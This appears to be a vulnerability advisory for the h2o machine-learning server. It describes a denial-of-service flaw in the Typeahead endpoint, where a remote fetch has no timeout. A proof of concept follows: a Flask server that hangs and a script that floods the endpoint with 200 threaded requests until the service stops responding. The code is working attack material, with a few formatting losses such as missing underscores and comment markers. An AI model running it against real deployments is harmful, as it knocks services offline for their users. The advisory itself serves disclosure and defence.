Affected versions of this package are vulnerable to Synchronous Access of Remote Resource without Timeout via the typeahead endpoint due to lacking timeout when checking that a specified resource exists. An attacker can cause the application to block and become unresponsive to other requests by sending multiple requests to an attacker-controlled server that hangs.

1. Run the h2o-app using java -jar h2o.jar;

2. Run the following Flask server:

from flask import Flask
import time

app = Flask(name)
@app.route("/", defaults={"path": ""})
@app.route("/<path:path>", methods=["GET", "POST"])
def catch_all(path):
    if "slow" in path:
        time.sleep(10000)
    return "OK", 200
if name == 'main':
    app.run()

3. Run the following Python script:

import threading
import requests

H2O_ADDRESS = "x.x.x.x"
FLASK_ADDRESS = "x.x.x.x"
def send_req():
    s = "http://{}:54321/3/Typeahead/files?src=http://{}:5000/slow&limit=-1".format(H2O_ADDRESS, FLASK_ADDRESS)
    requests.get(s)
Not completely sure how many are necessary.
It seems like there just needs to be enough for it to exhaust all workers/threads.
for x in range(200):
    threading.Thread(target=send_req).start()

4. Observe that all endpoints (and the frontend-files served by the server) become unresponsive.

• Vulnerable Code